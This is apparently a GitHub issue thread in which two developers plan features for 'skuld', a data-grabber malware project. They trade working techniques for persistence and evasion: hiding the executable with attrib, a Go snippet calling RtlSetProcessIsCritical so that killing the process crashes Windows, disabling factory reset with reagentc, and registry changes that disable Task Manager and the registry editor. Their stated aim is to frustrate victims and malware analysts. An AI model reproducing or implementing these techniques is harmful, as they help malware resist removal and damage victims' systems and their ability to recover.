Idea

[EvilBytecode]

Can i add soon feature like setting process as critical -> if someone tries to delete it or crash it in nutshell they wouldnt be able to beacuse if the process is in critical state and they try to kill it, it will bsod lol.

[EvilBytecode]

also kirby, if you add attributes on the startup (attrib +h +s) the exe wont be visible

[hackirby]

Can i add soon feature like setting process as critical -> if someone tries to delete it or crash it in nutshell they wouldnt be able to beacuse if the process is in critical state and they try to kill it, it will bsod lol.

Feel free to make pull requests without hesitation.

also kirby, if you add attributes on the startup (attrib +h +s) the exe wont be visible

Previously, I had implemented this feature but removed it (https://github.com/hackirby/skuld/commit/51cacadf34b5d6a5b47813bcfa86e317914e9367) due to concerns that Windows might not start the program if it remained hidden. However, after conducting a recent test and confirming that it does start, I will now reintroduce this feature.

[hackirby]

fixed in https://github.com/hackirby/skuld/commit/f2337f35736c7294c06c5d0e03bb6b08e57fd7bf

[EvilBytecode]

there are some ways, what do you think is the best one.

[EvilBytecode]

either rtl or just 2 processes you can mask it as svchost or conhost ifyk.

[hackirby]

rtlsetprocessascriticate needs UAC bypass in order to work

package main

import (
    "fmt"
    "syscall"
)

var (
    modNtDll          = syscall.NewLazyDLL("ntdll.dll")
    procRtlSetProcessIsCritical = modNtDll.NewProc("RtlSetProcessIsCritical")
)

func main() {
    procRtlSetProcessIsCritical.Call(1, 0, 0)

    // don't exit (or BSOD)
    var input string
    fmt.Scanln(&input)
}

The other method does not need administrative privileges, but... I'm not entirely convinced that triggering a BSOD would really be useful.

I think it would just be annoying x)

[EvilBytecode]

• So kirby ill provide down below some code samples and you can implement them. It will be optional :

• Switch Mouse buttons : RUNDLL32.EXE USER32.DLL,SwapMouseButton
• Description : Can confuse, more like troll feature.

• Uac Needed ? : ❌

• Disable Factory Reset : reagentc.exe /disable
• Description : This will just turn off factory reset.. no grabber has this feature 👍 (on github)..

• Uac Needed ? : ✅

• Critical Process \ Why should it be added?
• Basically if someone bypasses antidebug, talking about the termination method ProcessHacker has multiple ways to crash process. and if they manage to do that, antidebug in nutshell is useless. if they manage SOMEHOW to acess even ProcessHacker. if they do the CritcalState comes in save and if they try to kill it, they will BSOD. Which will left them annoyed.
• Inorder to remove critical state they would need to use something like this: https://github.com/ZeroMemoryEx/RSPCKiller

• Also as ex malware analyst, it would left me just really annoyed.

• Disabling TaskMgr : https://github.com/ThomasThelen/Disable-Task-Manager/blob/master/DisableTaskManager.py
• Disabling Reg :

  key = OpenKey(HKEY_CURRENT_USER,r"Software\Microsoft\Windows\CurrentVersion\Policies\System",0, KEY_ALL_ACCESS)
  SetValueEx(key, "DisableRegistryTools", 0, REG_DWORD, 1)

• This is pretty simple. also if its possible you can contact me on Discord or Telegram.
• Tele: https://t.me/codepulze
• Discord : godfathercodepulze, we can discuss there further.

[hackirby]

Disabling Task Manager and Registry Editor is a smart move. Also, placing the executable in Critical Process would be a good idea to enhance its protection against debugging.

I don't want to talk about skuld on Discord because I'm afraid of being termed. Unfortunately, I can't use Telegram, but you can reach me via this Matrix link: https://matrix.to/#/@hackirby:matrix.org

[EvilBytecode]

okay, ill check the matrix. anyways ill make soon code samples. and you can add them but firstly i need to finish my other project .. give me some hours. if you dont want to wait, just do it yourself its extremly simple 😄 .

[EvilBytecode]

check matrix

[hackirby]

okay, ill check the matrix. anyways ill make soon code samples. and you can add them but firstly i need to finish my other project .. give me some hours. if you dont want to wait, just do it yourself its extremly simple 😄 .

I understand. I'm quite busy myself. Take all the time you need.

check matrix

I joined the chat and replied to your messages 👍

[EvilBytecode]

Hi, https://github.com/EvilBytecode/RtlSetProcessIsCritical/blob/main/CriticalProcess.go

[hackirby]

Hi, https://github.com/EvilBytecode/RtlSetProcessIsCritical/blob/main/CriticalProcess.go

I noticed your code for this feature is quite long. I've written a shorter version that achieves the same functionality in this issue. Perhaps we can review and compare our approaches?

rtlsetprocessascriticate needs UAC bypass in order to work

package main

import (
    "fmt"
    "syscall"
)

var (
    modNtDll          = syscall.NewLazyDLL("ntdll.dll")
    procRtlSetProcessIsCritical = modNtDll.NewProc("RtlSetProcessIsCritical")
)

func main() {
    procRtlSetProcessIsCritical.Call(1, 0, 0)

    // don't exit (or BSOD)
    var input string
    fmt.Scanln(&input)
}

The other method does not need administrative privileges, but... I'm not entirely convinced that triggering a BSOD would really be useful.

I think it would just be annoying x)

[EvilBytecode]

wont work beacuse of adjust token priviligies

[hackirby]

You're right. My code used to work after elevating privileges when I tested it some time ago, but now it doesn't, whereas your code works perfectly.

[EvilBytecode]

Yesyes